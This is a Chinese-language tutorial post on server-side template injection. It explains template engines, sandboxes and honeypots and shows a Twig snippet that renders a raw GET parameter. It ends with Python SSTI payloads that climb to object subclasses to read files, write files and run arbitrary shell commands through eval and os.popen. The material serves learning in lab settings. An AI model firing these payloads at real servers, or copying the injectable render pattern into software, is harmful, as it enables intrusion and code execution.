SST模板注入-CFANZ编程社区

一、概念（废话）

SSTI即(server-side template injection)服务器模板,平时我们常用的有sql注入，xss注入，xml注入和命令注入等等。大家应该都知道sql注入的原理以及方式，而模板注入的原理也很类似都是通过输入一些指令在后端处理进行了语句的拼接然后执行。模板注入不同的是它是针对python、php、java、nodejs、javascript或是ruby的网站处理框架。

二、模板引擎（摘自百度百科）

模板引擎不属于特定技术领域，它是跨领域跨平台的概念。在Asp下有模板引擎，在PHP下也有模板引擎，在C#下也有，甚至JavaScript、WinForm开发都会用到模板引擎技术。

模板引擎可以让（网站）程序实现界面与数据分离，业务代码与逻辑代码的分离，这就大大提升了开发效率，良好的设计也使得代码重用变得更加容易。

#沙盒

沙盒就好比虚拟机，即使被攻击也不会对真实的环境造成影响，当被病毒破坏后也十分容易重构。再讲一下蜜罐，蜜罐跟沙盒是完全不同的，沙盒的作用像是将恶意的软件放在一个封闭的盒子里进行测试，而蜜罐则是一个陷阱，专门引诱攻击者进行入侵，像是伪造了一个实际的网络，有文件服务器、web服务器等，在攻击者渗透的同时监视攻击者的行为从而分析攻击方式进行预防。

三、SSTI

借用另一篇博客的例子

$output = $twig->render("Hello {{name}}", array("name" => $_GET["name"])); 
echo $output;

此处的name就会产生模板注入漏洞。

这里用vulhub的SSTI靶场环境举个例子

记住这个guest

注意我的url里面多了一个name的传参，形式是用两个大括号包起来的表达式，而guest变成了表达式运算后的值，说明我们传入的参数被执行了。

Python的SSTI

//获取基本类
''.__class__.__mro__[1]
{}.__class__.__bases__[0]
().__class__.__bases__[0]
[].__class__.__bases__[0]
object

//读文件
().__class__.__bases__[0].__subclasses__()[40](r'C:\1.php').read()
object.__subclasses__()[40](r'C:\1.php').read()

//写文件
().__class__.__bases__[0].__subclasses__()[40]('/var/www/html/input', 'w').write('123')
object.__subclasses__()[40]('/var/www/html/input', 'w').write('123')

//执行任意命令
().__class__.__bases__[0].__subclasses__()[59].__init__.func_globals.values()[13]['eval']('__import__("os").popen("ls  /var/www/html").read()' )
object.__subclasses__()[59].__init__.func_globals.values()[13]['eval']('__import__("os").popen("ls  /var/www/html").read()' )